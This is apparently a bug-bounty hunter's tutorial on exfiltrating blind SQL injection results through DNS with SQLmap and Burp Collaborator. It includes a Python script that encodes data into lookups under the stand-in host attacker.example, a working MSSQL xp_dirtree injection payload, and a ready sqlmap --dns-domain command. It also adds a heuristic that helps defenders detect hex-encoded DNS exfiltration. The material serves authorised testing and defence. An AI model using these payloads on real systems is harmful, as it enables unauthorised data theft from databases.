DNS for faster exfiltration of blind SQL injection data (Burp Suite and SQLmap only).
--
Extracting data through blind SQL injection is slow: each request answers at most one true/false question (roughly one bit of data), and time-based blind injection adds a deliberate "sleep" delay on top of every check. Exfiltrating the data through DNS removes that bottleneck. The injected query makes the database server resolve a hostname that carries the hex-encoded query result, so a whole chunk of data arrives per request at a nameserver you control. SQLmap implements this technique (its --dns-domain option), and the Burp Suite extension described below lets Burp Collaborator act as the receiving nameserver. Two caveats: the technique only works when the DBMS can trigger an outbound DNS lookup (for example through a UNC path or a name-resolution function) and the database host can resolve external names; and although the traffic travels over DNS rather than HTTP, which can slip past controls that only inspect web traffic, a burst of long hex-encoded subdomains of a single domain stands out to anyone monitoring DNS queries.
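The following Python script is an added example, not code from the original post, from SQLmap or from the Burp extension. It shows the mechanics behind the technique: hex-encoding a query result, packing it into DNS names that respect the 63-octet label and 253-octet name limits, reassembling the value from the lookups a nameserver logged (out of order, duplicated by resolver retries, and case-folded), comparing the request count with a boolean-blind bisection, and the defender-side check that the caveat above refers to. The domain attacker.example, the MSSQL xp_dirtree fragment and the sample value are constructed for the example; SQLmap generates its own DBMS-specific payloads.

```python
import binascii
import math
import re

MAX_LABEL = 63   # RFC 1035: a DNS label is at most 63 octets
MAX_NAME = 253   # RFC 1035: a domain name in text form is at most 253 octets
# Assumption: a domain whose authoritative nameserver logs every lookup
# (SQLmap's own DNS listener, or the Collaborator domain from the Burp extension).
EXFIL_DOMAIN = "attacker.example"


def _chunk_len(domain: str) -> int:
    """Hex characters that fit in the data label of '<seq>.<hex>.<domain>'."""
    return min(MAX_LABEL, MAX_NAME - len(domain) - len("00.."))


def encode_queries(value: bytes, domain: str = EXFIL_DOMAIN) -> list:
    """Hex-encode a value and split it into DNS names, one lookup per name.
    Hex is used because labels are case-insensitive and only safely carry
    [a-z0-9-]; raw bytes or base64 could be mangled or rejected by resolvers.
    A two-hex-digit sequence label lets the receiver reorder the lookups."""
    hexdata = binascii.hexlify(value).decode("ascii")
    n = _chunk_len(domain)
    chunks = [hexdata[i:i + n] for i in range(0, len(hexdata), n)]
    if len(chunks) > 256:
        raise ValueError("value too long for a two-digit sequence label")
    return [f"{seq:02x}.{chunk}.{domain}" for seq, chunk in enumerate(chunks)]


def mssql_payload(inner_select: str, domain: str = EXFIL_DOMAIN) -> str:
    """Illustrative MSSQL injection fragment (assumed: stacked queries allowed
    and the login may call xp_dirtree). Resolving the UNC host name is what
    leaks the hex-encoded result; one lookup carries at most 31 bytes per
    label, so a real extraction loops with SUBSTRING over the value."""
    return (
        "DECLARE @d VARCHAR(64), @p VARCHAR(512);"
        f"SELECT @d = CONVERT(VARCHAR(64), CONVERT(VARBINARY(31), ({inner_select})), 2);"
        f"SET @p = '\\\\' + @d + '.{domain}\\x';"
        "EXEC master..xp_dirtree @p;"
    )


QUERY_RE = re.compile(r"^([0-9a-f]{2})\.([0-9a-f]{1,63})\.(.+)$", re.I)


def decode_queries(seen_names, domain: str = EXFIL_DOMAIN) -> bytes:
    """Reassemble the value from the lookups the nameserver logged.
    Tolerates out-of-order delivery, duplicates from resolver retries,
    upper-cased names and unrelated queries for the same domain."""
    chunks = {}
    for name in seen_names:
        m = QUERY_RE.match(name.rstrip("."))
        if not m or m.group(3).lower() != domain.lower():
            continue  # not one of our exfiltration names
        chunks[int(m.group(1), 16)] = m.group(2).lower()
    if not chunks:
        raise ValueError("no matching lookups seen")
    missing = set(range(max(chunks) + 1)) - set(chunks)
    if missing:
        raise ValueError(f"missing chunks: {sorted(missing)}")
    return binascii.unhexlify("".join(chunks[i] for i in range(len(chunks))))


def requests_needed(nbytes: int, domain: str = EXFIL_DOMAIN) -> dict:
    """Boolean/time-based blind: a bisection over 0..255 costs 8 requests per
    byte (time-based adds a sleep to each). DNS: one request per name."""
    return {
        "blind_bisection": 8 * nbytes,
        "dns": math.ceil(2 * nbytes / _chunk_len(domain)),
    }


HEX_LABEL = re.compile(r"^[0-9a-f]{16,63}$", re.I)


def looks_like_hex_exfil(name: str) -> bool:
    """Defender-side heuristic: ordinary hostnames rarely contain a long
    pure-hex label. Combined with 'many distinct subdomains of one domain in
    a short window' it is a cheap detection for exactly this technique."""
    return any(HEX_LABEL.match(label) for label in name.rstrip(".").split("."))


if __name__ == "__main__":
    secret = b"admin:5f4dcc3b5aa765d61d8327deb882cf99"  # constructed sample row
    names = encode_queries(secret)
    # Simulated Collaborator log: reversed order, one retry, one unrelated query.
    log = list(reversed(names)) + [names[0].upper(), "www.attacker.example"]
    print(decode_queries(log) == secret, requests_needed(len(secret)))
    print(mssql_payload("SELECT @@version"))
```

The sequence label is what makes the decoder robust: resolvers retry, cache and reorder, so relying on arrival order silently corrupts the result.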
1. Prerequisites.
- Burp Suite Professional edition (https://portswigger.net/burp/pro)
- SQLmap (https://sqlmap.org)
2. Tool installation.
Open Burp Suite, go to the "Extender" tab, then click "BApp Store", scroll down until you find the extension "SQLmap DNS Collaborator", select it and click "Install".
3. Tool setup.
Open the "Extender" tab, click "Extensions", select the newly installed extension and then click "Output". Copy the Burp Collaborator domain printed there; it is the nameserver that will receive the DNS lookups.
4. Tool usage.
Pass the copied Collaborator domain to SQLmap through the "--dns-domain" argument, as in the example below (the URL is a placeholder; put the Collaborator domain in place of the one shown):
python sqlmap.py -u "https://site.com/notice.php?id=1" --dns-domain=rvqvtmob9f778j1ql4gg4c7t5abazz.burpcollaborator.net --dbs
If all goes well, SQLmap reports that data retrieval through the DNS channel was successful, the message marked in red in the image below; if it instead reports that the DNS channel failed, the database server could not trigger or resolve the lookup and SQLmap falls back to its normal blind techniques:
I'm David Botelho Mariano. I take part in bug bounty programs on HackerOne (https://hackerone.com) as a security engineer. For professional contact, send me an email at contato.davidmariano@gmail.com.
References:
https://github.com/portswigger/sqlmap-dns-collaborator
https://pentest.blog/data-ex-filtration-with-dns-in-sqli-attacks/